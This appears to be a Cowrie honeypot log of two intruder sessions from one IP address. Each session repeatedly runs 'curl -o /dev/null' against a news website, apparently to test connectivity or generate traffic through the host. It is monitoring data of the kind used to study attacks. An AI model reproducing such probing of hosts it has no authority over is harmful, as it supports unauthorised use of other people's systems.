{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.610116Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.626251Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.627490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.628473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.636259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.637978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.640508Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.646770Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.664507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.665492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.675647Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.676567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.696481Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.702456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.703472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.713664Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.714630Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.721615Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.740495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.741477Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.744421Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.753713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.754696Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.761542Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.762955Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.782182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.783361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.794340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.795266Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.801816Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.819691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.820669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.834555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.835476Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.843693Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.845333Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.853887Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.856733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.857680Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.876322Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.877274Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.894131Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.895056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.898496Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.920682Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.921655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.937757Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.941458Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.943667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.944461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.972916Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.973951Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.992387Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.996073Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:57.998983Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:57.999849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.002472Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.021611Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.022806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.038354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.039595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.049042Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.061208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.062213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.070271Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.079773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.080882Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.102929Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.105353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.106593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.111988Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.118472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.119558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.126000Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.147473Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.148423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.158075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.159147Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.180861Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.185728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.186625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.191694Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.194166Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.195085Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:58.212935Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:58.225625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
